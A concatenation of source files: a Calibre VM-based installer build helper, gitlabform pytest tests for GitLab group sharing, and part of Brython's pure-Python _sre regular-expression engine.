        return 'started' in subprocess.Popen('/etc/init.d/vmware status', shell=True, stdout=subprocess.PIPE).stdout.read()

    def start_vmware(self):
        if not self.vmware_started():
            # KVM and VMWare cannot coexist; unload KVM first if present.
            if os.path.exists('/dev/kvm'):
                subprocess.check_call('sudo rmmod -w kvm-intel kvm', shell=True)
            subprocess.Popen('sudo /etc/init.d/vmware start', shell=True)

    def stop_vmware(self):
        # Retry the stop until it succeeds, then unload leftover modules.
        while True:
            try:
                subprocess.check_call('sudo /etc/init.d/vmware stop', shell=True)
                break
            except:
                pass
        while 'vmblock' in open('/proc/modules').read():
            subprocess.check_call('sudo rmmod -f vmblock')

    def run_vm(self):
        # Launch the VM only if it is not already running.
        if is_vm_running(self.VM_CHECK or self.VM_NAME):
            return
        self.__p = subprocess.Popen([self.vm])

    def start_vm(self, sleep=75):
        """Boots the VM, waits until it is reachable, then copies and
        runs the build script over SSH."""
        ssh_host = self.VM_NAME
        self.run_vm()
        build_script = self.get_build_script()
        t = tempfile.NamedTemporaryFile(suffix='.sh')
        t.write(build_script)
        t.flush()
        print 'Waiting for VM to startup'
        # Poll with ping until the guest network is up.
        while subprocess.call('ping -q -c1 '+ssh_host, shell=True,
                stdout=open('/dev/null', 'w')) != 0:
            time.sleep(5)
        time.sleep(self.EXTRA_SLEEP)
        print 'Trying to SSH into VM'
        subprocess.check_call(('scp', t.name, ssh_host+':build-calibre'))
        subprocess.check_call(self.BUILD_CMD%ssh_host, shell=True)

    def installer(self):
        return installer_name(self.INSTALLER_EXT, self.IS_64_BIT)

    def run(self, opts):
        for x in ('dont_shutdown', 'vm'):
            setattr(self, x, getattr(opts, x))
        if self.vm is None:
            self.vm = self.VM
        if not self.vmware_started():
            self.start_vmware()
        subprocess.call(['chmod', '-R', '+r', 'recipes'])
        self.start_vm()
        self.download_installer()
        if not self.dont_shutdown:
            subprocess.call(['ssh', self.VM_NAME]+self.SHUTDOWN_CMD)

    def download_installer(self):
        """Copies the freshly built installer out of the VM into dist/."""
        installer = self.installer()
        subprocess.check_call(['scp',
            self.VM_NAME+':build/calibre/'+installer, 'dist'])
        if not os.path.exists(installer):
            self.warn('Failed to download installer: '+installer)
            raise SystemExit(1)

    def clean(self):
        installer = self.installer()
        if os.path.exists(installer):
            os.remove(installer)
# license: gpl-3.0
# ---- egnyte/gitlabform :: gitlabform/gitlabform/test/test_group_shared_with.py ----
import pytest
from gitlabform.gitlabform.test import (
run_gitlabform,
)
@pytest.fixture(scope="function")
def one_owner(gitlab, group, groups, users):
    """Yields *group* with users[0] as its only member (access level 50),
    restoring root ownership and removing all members/shares on teardown."""
    gitlab.add_member_to_group(group, users[0], 50)
    gitlab.remove_member_from_group(group, "root")

    yield group

    # we are running tests with root's token, so every group is created
    # with a single user - root as owner. we restore the group to
    # this state here.
    gitlab.add_member_to_group(group, "root", 50)

    # we try to remove all users, not just those added above,
    # on purpose, as more may have been added in the tests
    for user in users:
        gitlab.remove_member_from_group(group, user)

    for share_with in groups:
        gitlab.remove_share_from_group(group, share_with)
class TestGroupSharedWith:
    """End-to-end tests for the ``group_shared_with`` gitlabform config
    section, run against a live GitLab instance via the fixtures."""

    def test__add_group(self, gitlab, group, users, groups, one_owner):
        # Sharing the group must not change its direct member list.
        no_of_members_before = len(gitlab.get_group_members(group))

        add_shared_with = f"""
projects_and_groups:
  {group}/*:
    group_members:
      {users[0]}:
        access_level: 50
    group_shared_with:
      {groups[0]}:
        group_access_level: 30
      {groups[1]}:
        group_access_level: 30
"""

        run_gitlabform(add_shared_with, group)

        members = gitlab.get_group_members(group)
        assert len(members) == no_of_members_before, members

        shared_with = gitlab.get_group_shared_with(group)
        assert len(shared_with) == 2

    def test__remove_group(self, gitlab, group, users, groups, one_owner):
        # Pre-share with two groups, then let gitlabform (with
        # enforce_group_members) drop the one not in the config.
        gitlab.add_share_to_group(group, groups[0], 50)
        gitlab.add_share_to_group(group, groups[1], 50)

        no_of_members_before = len(gitlab.get_group_members(group))
        no_of_shared_with_before = len(gitlab.get_group_shared_with(group))

        remove_group = f"""
projects_and_groups:
  {group}/*:
    enforce_group_members: true
    group_members:
      {users[0]}:
        access_level: 50
    group_shared_with:
      {groups[0]}:
        group_access_level: 30
"""

        run_gitlabform(remove_group, group)

        members = gitlab.get_group_members(group)
        assert len(members) == no_of_members_before

        shared_with = gitlab.get_group_shared_with(group)
        assert len(shared_with) == no_of_shared_with_before - 1
        assert [sw["group_name"] for sw in shared_with] == [groups[0]]

    def test__not_remove_groups_with_enforce_false(
        self, gitlab, group, users, groups, one_owner
    ):
        no_of_members_before = len(gitlab.get_group_members(group))
        no_of_shared_with_before = len(gitlab.get_group_shared_with(group))

        setups = [
            # flag explicitly set to false
            f"""
projects_and_groups:
  {group}/*:
    enforce_group_members: false
    group_members:
      {users[0]}:
        access_level: 50
    group_shared_with: []
""",
            # flag not set at all (but the default is false)
            f"""
projects_and_groups:
  {group}/*:
    group_members:
      {users[0]}:
        access_level: 50
    group_shared_with: []
""",
        ]
        for setup in setups:
            run_gitlabform(setup, group)

            members = gitlab.get_group_members(group)
            assert len(members) == no_of_members_before
            members_usernames = {member["username"] for member in members}
            assert members_usernames == {
                f"{users[0]}",
            }

            shared_with = gitlab.get_group_shared_with(group)
            assert len(shared_with) == no_of_shared_with_before

    def test__change_group_access(self, gitlab, group, groups, users, one_owner):
        change_some_users_access = f"""
projects_and_groups:
  {group}/*:
    group_members:
      {users[0]}:
        access_level: 50
    group_shared_with:
      {groups[0]}:
        group_access_level: 30
      {groups[1]}:
        group_access_level: 50
"""

        run_gitlabform(change_some_users_access, group)

        shared_with = gitlab.get_group_shared_with(group)
        for shared_with_group in shared_with:
            if shared_with_group["group_name"] == f"{groups[0]}":
                assert shared_with_group["group_access_level"] == 30
            if shared_with_group["group_name"] == f"{groups[1]}":
                assert shared_with_group["group_access_level"] == 50

    def test__remove_all(self, gitlab, group, users, one_owner):
        # Empty list + enforce -> all shares must be removed.
        no_shared_with = f"""
projects_and_groups:
  {group}/*:
    enforce_group_members: true
    group_members:
      {users[0]}:
        access_level: 50
    group_shared_with: []
"""

        run_gitlabform(no_shared_with, group)

        shared_with = gitlab.get_group_shared_with(group)
        assert len(shared_with) == 0
# license: mit
# ---- GodBlessPP/W17test_2nd_1 :: static/Brython3.1.1-20150328-091302/Lib/_sre.py ----
# NOT_RPYTHON
"""
A pure Python reimplementation of the _sre module from CPython 2.4
Copyright 2005 Nik Haldimann, licensed under the MIT license
This code is based on material licensed under CNRI's Python 1.6 license and
copyrighted by: Copyright (c) 1997-2001 by Secret Labs AB
"""
MAXREPEAT = 2147483648
#import array
import operator, sys
from sre_constants import ATCODES, OPCODES, CHCODES
from sre_constants import SRE_INFO_PREFIX, SRE_INFO_LITERAL
from sre_constants import SRE_FLAG_UNICODE, SRE_FLAG_LOCALE
import sys
# Identifying as _sre from Python 2.3 or 2.4
#if sys.version_info[:2] >= (2, 4):
MAGIC = 20031017
#else:
# MAGIC = 20030419
# In _sre.c this is bytesize of the code word type of the C implementation.
# There it's 2 for normal Python builds and more for wide unicode builds (large
# enough to hold a 32-bit UCS-4 encoded character). Since here in pure Python
# we only see re bytecodes as Python longs, we shouldn't have to care about the
# codesize. But sre_compile will compile some stuff differently depending on the
# codesize (e.g., charsets).
# starting with python 3.3 CODESIZE is 4
#if sys.maxunicode == 65535:
# CODESIZE = 2
#else:
CODESIZE = 4
copyright = "_sre.py 2.4c Copyright 2005 by Nik Haldimann"
def getcodesize():
    """Returns the byte size of one regex code word (module constant
    CODESIZE) used by this pure-Python engine."""
    return CODESIZE
def compile(pattern, flags, code, groups=0, groupindex={}, indexgroup=[None]):
    """Compiles (or rather just converts) a pattern descriptor to a SRE_Pattern
    object. Actual compilation to opcodes happens in sre_compile.

    NOTE(review): mutable default arguments (dict/list) are shared
    across calls; safe only if callers never mutate them -- confirm.
    """
    return SRE_Pattern(pattern, flags, code, groups, groupindex, indexgroup)
def getlower(char_ord, flags):
    """Returns the lowercase ordinal for *char_ord* under the given
    regex *flags*.

    Lowercasing applies to ASCII always, to any character in UNICODE
    mode, and to 8-bit characters in LOCALE mode; everything else is
    returned unchanged.
    """
    in_ascii = char_ord < 128
    unicode_mode = bool(flags & SRE_FLAG_UNICODE)
    locale_byte = bool(flags & SRE_FLAG_LOCALE) and char_ord < 256
    if not (in_ascii or unicode_mode or locale_byte):
        return char_ord
    return ord(chr(char_ord).lower())
class SRE_Pattern:
    """Compiled-pattern object mirroring CPython's _sre pattern type.

    Matching work is delegated to a _State object driven by the opcode
    list in self._code.
    """

    def __init__(self, pattern, flags, code, groups=0, groupindex={}, indexgroup=[None]):
        # NOTE(review): mutable default args are shared across instances;
        # safe only while they are never mutated -- confirm.
        self.pattern = pattern
        self.flags = flags
        self.groups = groups
        self.groupindex = groupindex  # Maps group names to group indices
        self._indexgroup = indexgroup  # Maps indices to group names
        self._code = code

    def match(self, string, pos=0, endpos=sys.maxsize):
        """If zero or more characters at the beginning of string match this
        regular expression, return a corresponding MatchObject instance. Return
        None if the string does not match the pattern."""
        state = _State(string, pos, endpos, self.flags)
        if state.match(self._code):
            return SRE_Match(self, state)
        return None

    def search(self, string, pos=0, endpos=sys.maxsize):
        """Scan through string looking for a location where this regular
        expression produces a match, and return a corresponding MatchObject
        instance. Return None if no position in the string matches the
        pattern."""
        state = _State(string, pos, endpos, self.flags)
        if state.search(self._code):
            return SRE_Match(self, state)
        else:
            return None

    def findall(self, string, pos=0, endpos=sys.maxsize):
        """Return a list of all non-overlapping matches of pattern in string."""
        matchlist = []
        state = _State(string, pos, endpos, self.flags)
        while state.start <= state.end:
            state.reset()
            state.string_position = state.start
            if not state.search(self._code):
                break
            match = SRE_Match(self, state)
            # Result shape depends on group count: whole match, single
            # group, or tuple of groups.
            if self.groups == 0 or self.groups == 1:
                item = match.group(self.groups)
            else:
                item = match.groups("")
            matchlist.append(item)
            # Advance by one on a zero-width match to avoid looping.
            if state.string_position == state.start:
                state.start += 1
            else:
                state.start = state.string_position
        return matchlist

    def _subx(self, template, string, count=0, subn=False):
        """Shared implementation behind sub() and subn()."""
        filter = template
        if not callable(template) and "\\" in template:
            # handle non-literal strings ; hand it over to the template compiler
            #import sre #sre was renamed to re
            #fix me brython
            #print("possible issue at _sre.py line 116")
            import re as sre
            filter = sre._subx(self, template)
        state = _State(string, 0, sys.maxsize, self.flags)
        sublist = []

        n = last_pos = 0
        while not count or n < count:
            state.reset()
            state.string_position = state.start
            if not state.search(self._code):
                break
            if last_pos < state.start:
                # Copy the unmatched text preceding this match.
                sublist.append(string[last_pos:state.start])
            if not (last_pos == state.start and
                    last_pos == state.string_position and n > 0):
                # the above ignores empty matches on latest position
                if callable(filter):
                    sublist.append(filter(SRE_Match(self, state)))
                else:
                    sublist.append(filter)
                last_pos = state.string_position
                n += 1
            # Advance by one on a zero-width match to avoid looping.
            if state.string_position == state.start:
                state.start += 1
            else:
                state.start = state.string_position

        if last_pos < state.end:
            # Trailing unmatched text.
            sublist.append(string[last_pos:state.end])
        item = "".join(sublist)
        if subn:
            return item, n
        else:
            return item

    def sub(self, repl, string, count=0):
        """Return the string obtained by replacing the leftmost non-overlapping
        occurrences of pattern in string by the replacement repl."""
        return self._subx(repl, string, count, False)

    def subn(self, repl, string, count=0):
        """Return the tuple (new_string, number_of_subs_made) found by replacing
        the leftmost non-overlapping occurrences of pattern with the replacement
        repl."""
        return self._subx(repl, string, count, True)

    def split(self, string, maxsplit=0):
        """Split string by the occurrences of pattern."""
        splitlist = []
        state = _State(string, 0, sys.maxsize, self.flags)
        n = 0
        last = state.start
        while not maxsplit or n < maxsplit:
            state.reset()
            state.string_position = state.start
            if not state.search(self._code):
                break
            if state.start == state.string_position:  # zero-width match
                if last == state.end:  # or end of string
                    break
                state.start += 1
                continue
            splitlist.append(string[last:state.start])
            # add groups (if any)
            if self.groups:
                match = SRE_Match(self, state)
                splitlist.extend(list(match.groups(None)))
            n += 1
            last = state.start = state.string_position
        # Remainder after the final split point.
        splitlist.append(string[last:state.end])
        return splitlist

    def finditer(self, string, pos=0, endpos=sys.maxsize):
        """Return a list of all non-overlapping matches of pattern in string."""
        #scanner = self.scanner(string, pos, endpos)
        _list = []
        # NOTE(review): this scanner() result is immediately overwritten
        # below and appears to be dead code -- confirm before removing.
        _m = self.scanner(string, pos, endpos)
        _re = SRE_Scanner(self, string, pos, endpos)
        _m = _re.search()
        while _m:
            _list.append(_m)
            _m = _re.search()
        return _list
        #return iter(scanner.search, None)

    def scanner(self, string, start=0, end=sys.maxsize):
        return SRE_Scanner(self, string, start, end)

    def __copy__(self):
        raise TypeError("cannot copy this pattern object")

    def __deepcopy__(self):
        raise TypeError("cannot copy this pattern object")
class SRE_Scanner:
    """Undocumented scanner interface of sre: walks a string, returning one
    match (or None) per call to match()/search() and advancing past it."""

    def __init__(self, pattern, string, start, end):
        self.pattern = pattern
        self._state = _State(string, start, end, self.pattern.flags)

    def _match_search(self, run_engine):
        """Run one engine pass (match or search), build the match object,
        and advance the start position for the next call."""
        st = self._state
        st.reset()
        st.string_position = st.start
        found = None
        if run_engine(self.pattern._code):
            found = SRE_Match(self.pattern, st)
        if found is not None and st.string_position != st.start:
            st.start = st.string_position
        else:
            # No match, or a zero-width match: step one char forward so the
            # scanner cannot loop forever.
            st.start += 1
        return found

    def match(self):
        return self._match_search(self._state.match)

    def search(self):
        return self._match_search(self._state.search)
class SRE_Match:
    """Result object for a successful match, mirroring the re Match API
    (group/groups/groupdict/start/end/span/expand)."""

    def __init__(self, pattern, state):
        self.re = pattern
        self.string = state.string
        self.pos = state.pos
        self.endpos = state.end
        self.lastindex = state.lastindex
        if self.lastindex < 0:
            self.lastindex = None
        self.regs = self._create_regs(state)
        # lastindex must be checked for None first: "0 <= None" raises a
        # TypeError under Python 3.
        if self.lastindex is not None and pattern._indexgroup \
                and 0 <= self.lastindex < len(pattern._indexgroup):
            # The upper-bound check should not be necessary, as the re
            # compiler is supposed to always provide an _indexgroup list long
            # enough. But the re.Scanner class seems to screw up something
            # there, test_scanner in test_re won't work without upper-bound
            # checking. XXX investigate this and report bug to CPython.
            self.lastgroup = pattern._indexgroup[self.lastindex]
        else:
            self.lastgroup = None

    def _create_regs(self, state):
        """Creates a tuple of index pairs representing matched groups;
        (-1, -1) marks a group that did not participate."""
        regs = [(state.start, state.string_position)]
        for group in range(self.re.groups):
            mark_index = 2 * group
            if mark_index + 1 < len(state.marks) \
                    and state.marks[mark_index] is not None \
                    and state.marks[mark_index + 1] is not None:
                regs.append((state.marks[mark_index],
                             state.marks[mark_index + 1]))
            else:
                regs.append((-1, -1))
        return tuple(regs)

    def _get_index(self, group):
        """Map a group number or name to its index; raise IndexError if
        the group does not exist."""
        if isinstance(group, int):
            if group >= 0 and group <= self.re.groups:
                return group
        else:
            if group in self.re.groupindex:
                return self.re.groupindex[group]
        raise IndexError("no such group")

    def _get_slice(self, group, default):
        """Return the matched text of *group*, or *default* if the group
        did not participate in the match."""
        group_indices = self.regs[group]
        if group_indices[0] >= 0:
            return self.string[group_indices[0]:group_indices[1]]
        else:
            return default

    def start(self, group=0):
        """Returns the indices of the start of the substring matched by group;
        group defaults to zero (meaning the whole matched substring). Returns -1
        if group exists but did not contribute to the match."""
        return self.regs[self._get_index(group)][0]

    def end(self, group=0):
        """Returns the indices of the end of the substring matched by group;
        group defaults to zero (meaning the whole matched substring). Returns -1
        if group exists but did not contribute to the match."""
        return self.regs[self._get_index(group)][1]

    def span(self, group=0):
        """Returns the 2-tuple (m.start(group), m.end(group))."""
        return self.start(group), self.end(group)

    def expand(self, template):
        """Return the string obtained by doing backslash substitution and
        resolving group references on template."""
        # NOTE(review): imports the legacy 'sre' module name; presumably
        # Brython provides it as an alias for this module — confirm.
        import sre
        return sre._expand(self.re, self, template)

    def groups(self, default=None):
        """Returns a tuple containing all the subgroups of the match. The
        default argument is used for groups that did not participate in the
        match (defaults to None)."""
        groups = []
        for indices in self.regs[1:]:
            if indices[0] >= 0:
                groups.append(self.string[indices[0]:indices[1]])
            else:
                groups.append(default)
        return tuple(groups)

    def groupdict(self, default=None):
        """Return a dictionary containing all the named subgroups of the match.
        The default argument is used for groups that did not participate in the
        match (defaults to None)."""
        groupdict = {}
        for key, value in self.re.groupindex.items():
            groupdict[key] = self._get_slice(value, default)
        return groupdict

    def group(self, *args):
        """Returns one or more subgroups of the match. Each argument is either a
        group index or a group name."""
        if len(args) == 0:
            args = (0,)
        grouplist = []
        for group in args:
            grouplist.append(self._get_slice(self._get_index(group), None))
        if len(grouplist) == 1:
            return grouplist[0]
        else:
            return tuple(grouplist)

    def __copy__(self):
        # Bug fix: the original def had no *self* parameter, so invoking it
        # as a method raised an argument-count TypeError instead of this
        # deliberate one (and the message wrongly said "pattern object").
        raise TypeError("cannot copy this match object")

    def __deepcopy__(self, memo=None):
        # Bug fix: same missing-self defect as __copy__, plus copy.deepcopy
        # passes a memo dict that must be accepted.
        raise TypeError("cannot copy this match object")
class _State:
    """Mutable matching state for one engine run: the subject string, the
    current cursors, group marks, backtracking stacks and the active repeat
    context.  Both the bytecode interpreter and the scanner drive this."""
    def __init__(self, string, start, end, flags):
        self.string = string
        # Clamp the requested window to the actual string bounds.
        if start < 0:
            start = 0
        if end > len(string):
            end = len(string)
        self.start = start
        self.string_position = self.start
        self.end = end
        self.pos = start
        self.flags = flags
        self.reset()
    def reset(self):
        """Clear per-attempt state (marks, stacks, repeat chain)."""
        self.marks = []
        self.lastindex = -1
        self.marks_stack = []
        self.context_stack = []
        self.repeat = None
    def match(self, pattern_codes):
        """Run the opcode interpreter anchored at the current position;
        return True/False for match/mismatch."""
        # Optimization: Check string length. pattern_codes[3] contains the
        # minimum length for a string to possibly match.
        # brython.. the optimization doesn't work
        #if pattern_codes[0] == OPCODES["info"] and pattern_codes[3]:
        #    if self.end - self.string_position < pattern_codes[3]:
        #        #_log("reject (got %d chars, need %d)"
        #        #    % (self.end - self.string_position, pattern_codes[3]))
        #        return False
        dispatcher = _OpcodeDispatcher()
        self.context_stack.append(_MatchContext(self, pattern_codes))
        has_matched = None
        # Contexts act as resumable coroutines: a context stays on the stack
        # until the dispatcher reports a definite True/False for it.
        while len(self.context_stack) > 0:
            context = self.context_stack[-1]
            has_matched = dispatcher.match(context)
            if has_matched is not None: # don't pop if context isn't done
                self.context_stack.pop()
        return has_matched
    def search(self, pattern_codes):
        """Try match() at successive positions until one succeeds or the
        string is exhausted; uses prefix information when available."""
        flags = 0
        if pattern_codes[0] == OPCODES["info"]:
            # optimization info block
            # <INFO> <1=skip> <2=flags> <3=min> <4=max> <5=prefix info>
            if pattern_codes[2] & SRE_INFO_PREFIX and pattern_codes[5] > 1:
                return self.fast_search(pattern_codes)
            flags = pattern_codes[2]
            pattern_codes = pattern_codes[pattern_codes[1] + 1:]
        string_position = self.start
        if pattern_codes[0] == OPCODES["literal"]:
            # Special case: Pattern starts with a literal character. This is
            # used for short prefixes
            character = pattern_codes[1]
            while True:
                # Skip ahead to the next occurrence of the literal prefix.
                while string_position < self.end \
                        and ord(self.string[string_position]) != character:
                    string_position += 1
                if string_position >= self.end:
                    return False
                self.start = string_position
                string_position += 1
                self.string_position = string_position
                if flags & SRE_INFO_LITERAL:
                    return True
                if self.match(pattern_codes[2:]):
                    return True
            return False
        # General case
        while string_position <= self.end:
            self.reset()
            self.start = self.string_position = string_position
            if self.match(pattern_codes):
                return True
            string_position += 1
        return False
    def fast_search(self, pattern_codes):
        """Skips forward in a string as fast as possible using information from
        an optimization info block."""
        # pattern starts with a known prefix
        # <5=length> <6=skip> <7=prefix data> <overlap data>
        flags = pattern_codes[2]
        prefix_len = pattern_codes[5]
        prefix_skip = pattern_codes[6] # don't really know what this is good for
        prefix = pattern_codes[7:7 + prefix_len]
        overlap = pattern_codes[7 + prefix_len - 1:pattern_codes[1] + 1]
        pattern_codes = pattern_codes[pattern_codes[1] + 1:]
        i = 0
        string_position = self.string_position
        # Knuth-Morris-Pratt style scan: *overlap* tells how far the prefix
        # match survives after a mismatch.
        while string_position < self.end:
            while True:
                if ord(self.string[string_position]) != prefix[i]:
                    if i == 0:
                        break
                    else:
                        i = overlap[i]
                else:
                    i += 1
                    if i == prefix_len:
                        # found a potential match
                        self.start = string_position + 1 - prefix_len
                        self.string_position = string_position + 1 \
                                                     - prefix_len + prefix_skip
                        if flags & SRE_INFO_LITERAL:
                            return True # matched all of pure literal pattern
                        if self.match(pattern_codes[2 * prefix_skip:]):
                            return True
                        i = overlap[i]
                    break
            string_position += 1
        return False
    def set_mark(self, mark_nr, position):
        """Record the string position for mark *mark_nr* (group boundary)."""
        if mark_nr & 1:
            # This id marks the end of a group.
            # fix python 3 division incompatability
            #self.lastindex = mark_nr / 2 + 1
            self.lastindex = mark_nr // 2 + 1
        if mark_nr >= len(self.marks):
            self.marks.extend([None] * (mark_nr - len(self.marks) + 1))
        self.marks[mark_nr] = position
    def get_marks(self, group_index):
        """Return the (start, end) marks for a group, or (None, None)."""
        marks_index = 2 * group_index
        if len(self.marks) > marks_index + 1:
            return self.marks[marks_index], self.marks[marks_index + 1]
        else:
            return None, None
    def marks_push(self):
        # Snapshot marks + lastindex for backtracking.
        self.marks_stack.append((self.marks[:], self.lastindex))
    def marks_pop(self):
        # Restore and discard the top snapshot.
        self.marks, self.lastindex = self.marks_stack.pop()
    def marks_pop_keep(self):
        # Restore the top snapshot but leave it on the stack.
        self.marks, self.lastindex = self.marks_stack[-1]
    def marks_pop_discard(self):
        # Drop the top snapshot without restoring it.
        self.marks_stack.pop()
    def lower(self, char_ord):
        """Case-fold a character ordinal according to the pattern flags."""
        return getlower(char_ord, self.flags)
class _MatchContext:
    """One frame of pattern interpretation: a slice of the compiled code plus
    private string/code cursors, layered on a shared _State."""

    def __init__(self, state, pattern_codes):
        self.state = state
        self.pattern_codes = pattern_codes
        self.string_position = state.string_position
        self.code_position = 0
        self.has_matched = None

    def push_new_context(self, pattern_offset):
        """Creates a new child context of this context and pushes it on the
        stack. pattern_offset is the offset off the current code position to
        start interpreting from."""
        code_start = self.code_position + pattern_offset
        child = _MatchContext(self.state, self.pattern_codes[code_start:])
        self.state.context_stack.append(child)
        return child

    def peek_char(self, peek=0):
        return self.state.string[self.string_position + peek]

    def skip_char(self, skip_count):
        self.string_position += skip_count

    def remaining_chars(self):
        return self.state.end - self.string_position

    def peek_code(self, peek=0):
        return self.pattern_codes[self.code_position + peek]

    def skip_code(self, skip_count):
        self.code_position += skip_count

    def remaining_codes(self):
        return len(self.pattern_codes) - self.code_position

    def at_beginning(self):
        return self.string_position == 0

    def at_end(self):
        return self.string_position == self.state.end

    def at_linebreak(self):
        if self.at_end():
            return False
        return _is_linebreak(self.peek_char())

    def at_boundary(self, word_checker):
        if self.at_beginning() and self.at_end():
            return False
        before = not self.at_beginning() and word_checker(self.peek_char(-1))
        after = not self.at_end() and word_checker(self.peek_char())
        return after != before
class _RepeatContext(_MatchContext):
    """Context created by the REPEAT opcode; chains to the enclosing repeat
    so MAX_UNTIL/MIN_UNTIL can restore it when the repetition finishes."""

    def __init__(self, context):
        repeat_codes = context.pattern_codes[context.code_position:]
        super().__init__(context.state, repeat_codes)
        self.count = -1
        self.previous = context.state.repeat
        self.last_position = None
class _Dispatcher:
    """Base class that routes opcode values to handler methods through a
    per-subclass DISPATCH_TABLE built from opcode names."""

    DISPATCH_TABLE = None

    def dispatch(self, code, context):
        """Invoke the handler registered for *code*, defaulting to unknown()."""
        method = self.DISPATCH_TABLE.get(code, self.__class__.unknown)
        return method(self, context)

    def unknown(self, code, ctx):
        raise NotImplementedError()

    # Modernized: decorator form instead of the legacy
    # "build_dispatch_table = classmethod(build_dispatch_table)" idiom.
    @classmethod
    def build_dispatch_table(cls, code_dict, method_prefix):
        """Populate DISPATCH_TABLE once per subclass, mapping each opcode
        value to the method named method_prefix + opcode name."""
        if cls.DISPATCH_TABLE is not None:
            return
        table = {}
        for key, value in code_dict.items():
            method_name = "%s%s" % (method_prefix, key)
            if hasattr(cls, method_name):
                table[value] = getattr(cls, method_name)
        cls.DISPATCH_TABLE = table
class _OpcodeDispatcher(_Dispatcher):
    """Interprets compiled sre bytecode one opcode at a time.

    Handlers that must wait for a child context (branches, repeats,
    assertions) are written as generators: they yield False to suspend until
    the child has been matched, and yield True when done.  dispatch() stores
    the live generator keyed by the context's id so it can be resumed.
    """
    def __init__(self):
        self.executing_contexts = {}
        self.at_dispatcher = _AtcodeDispatcher()
        self.ch_dispatcher = _ChcodeDispatcher()
        self.set_dispatcher = _CharsetDispatcher()
    def match(self, context):
        """Returns True if the current context matches, False if it doesn't and
        None if matching is not finished, ie must be resumed after child
        contexts have been matched."""
        while context.remaining_codes() > 0 and context.has_matched is None:
            opcode = context.peek_code()
            if not self.dispatch(opcode, context):
                return None
        if context.has_matched is None:
            context.has_matched = False
        return context.has_matched
    def dispatch(self, opcode, context):
        """Dispatches a context on a given opcode. Returns True if the context
        is done matching, False if it must be resumed when next encountered."""
        #if self.executing_contexts.has_key(id(context)):
        if id(context) in self.executing_contexts:
            generator = self.executing_contexts[id(context)]
            del self.executing_contexts[id(context)]
            has_finished = next(generator)
        else:
            method = self.DISPATCH_TABLE.get(opcode, _OpcodeDispatcher.unknown)
            has_finished = method(self, context)
            if hasattr(has_finished, "__next__"): # avoid using the types module
                generator = has_finished
                has_finished = next(generator)
        if not has_finished:
            self.executing_contexts[id(context)] = generator
        return has_finished
    def op_success(self, ctx):
        # end of pattern
        #self._log(ctx, "SUCCESS")
        ctx.state.string_position = ctx.string_position
        ctx.has_matched = True
        return True
    def op_failure(self, ctx):
        # immediate failure
        #self._log(ctx, "FAILURE")
        ctx.has_matched = False
        return True
    def general_op_literal(self, ctx, compare, decorate=lambda x: x):
        # Shared body for the four LITERAL variants: *compare* is eq/ne and
        # *decorate* optionally case-folds both sides.
        #print(ctx.peek_char())
        if ctx.at_end() or not compare(decorate(ord(ctx.peek_char())),
                                       decorate(ctx.peek_code(1))):
            ctx.has_matched = False
        ctx.skip_code(2)
        ctx.skip_char(1)
    def op_literal(self, ctx):
        # match literal string
        # <LITERAL> <code>
        #self._log(ctx, "LITERAL", ctx.peek_code(1))
        self.general_op_literal(ctx, operator.eq)
        return True
    def op_not_literal(self, ctx):
        # match anything that is not the given literal character
        # <NOT_LITERAL> <code>
        #self._log(ctx, "NOT_LITERAL", ctx.peek_code(1))
        self.general_op_literal(ctx, operator.ne)
        return True
    def op_literal_ignore(self, ctx):
        # match literal regardless of case
        # <LITERAL_IGNORE> <code>
        #self._log(ctx, "LITERAL_IGNORE", ctx.peek_code(1))
        self.general_op_literal(ctx, operator.eq, ctx.state.lower)
        return True
    def op_not_literal_ignore(self, ctx):
        # match literal regardless of case
        # <LITERAL_IGNORE> <code>
        #self._log(ctx, "LITERAL_IGNORE", ctx.peek_code(1))
        self.general_op_literal(ctx, operator.ne, ctx.state.lower)
        return True
    def op_at(self, ctx):
        # match at given position
        # <AT> <code>
        #self._log(ctx, "AT", ctx.peek_code(1))
        if not self.at_dispatcher.dispatch(ctx.peek_code(1), ctx):
            ctx.has_matched = False
            #print('_sre.py:line693, update context.has_matched variable')
            return True
        ctx.skip_code(2)
        return True
    def op_category(self, ctx):
        # match at given category
        # <CATEGORY> <code>
        #self._log(ctx, "CATEGORY", ctx.peek_code(1))
        if ctx.at_end() or not self.ch_dispatcher.dispatch(ctx.peek_code(1), ctx):
            ctx.has_matched = False
            #print('_sre.py:line703, update context.has_matched variable')
            return True
        ctx.skip_code(2)
        ctx.skip_char(1)
        return True
    def op_any(self, ctx):
        # match anything (except a newline)
        # <ANY>
        #self._log(ctx, "ANY")
        if ctx.at_end() or ctx.at_linebreak():
            ctx.has_matched = False
            #print('_sre.py:line714, update context.has_matched variable')
            return True
        ctx.skip_code(1)
        ctx.skip_char(1)
        return True
    def op_any_all(self, ctx):
        # match anything
        # <ANY_ALL>
        #self._log(ctx, "ANY_ALL")
        if ctx.at_end():
            ctx.has_matched = False
            #print('_sre.py:line725, update context.has_matched variable')
            return True
        ctx.skip_code(1)
        ctx.skip_char(1)
        return True
    def general_op_in(self, ctx, decorate=lambda x: x):
        # Shared body for IN / IN_IGNORE: test set membership of the current
        # character (optionally case-folded by *decorate*).
        #self._log(ctx, "OP_IN")
        #print('general_op_in')
        if ctx.at_end():
            ctx.has_matched = False
            #print('_sre.py:line734, update context.has_matched variable')
            return
        skip = ctx.peek_code(1)
        ctx.skip_code(2) # set op pointer to the set code
        #print(ctx.peek_char(), ord(ctx.peek_char()),
        #      decorate(ord(ctx.peek_char())))
        if not self.check_charset(ctx, decorate(ord(ctx.peek_char()))):
            #print('_sre.py:line738, update context.has_matched variable')
            ctx.has_matched = False
            return
        ctx.skip_code(skip - 1)
        ctx.skip_char(1)
        #print('end:general_op_in')
    def op_in(self, ctx):
        # match set member (or non_member)
        # <IN> <skip> <set>
        #self._log(ctx, "OP_IN")
        self.general_op_in(ctx)
        return True
    def op_in_ignore(self, ctx):
        # match set member (or non_member), disregarding case of current char
        # <IN_IGNORE> <skip> <set>
        #self._log(ctx, "OP_IN_IGNORE")
        self.general_op_in(ctx, ctx.state.lower)
        return True
    def op_jump(self, ctx):
        # jump forward
        # <JUMP> <offset>
        #self._log(ctx, "JUMP", ctx.peek_code(1))
        ctx.skip_code(ctx.peek_code(1) + 1)
        return True
    # skip info
    # <INFO> <skip>
    op_info = op_jump
    def op_mark(self, ctx):
        # set mark
        # <MARK> <gid>
        #self._log(ctx, "OP_MARK", ctx.peek_code(1))
        ctx.state.set_mark(ctx.peek_code(1), ctx.string_position)
        ctx.skip_code(2)
        return True
    def op_branch(self, ctx):
        # alternation
        # <BRANCH> <0=skip> code <JUMP> ... <NULL>
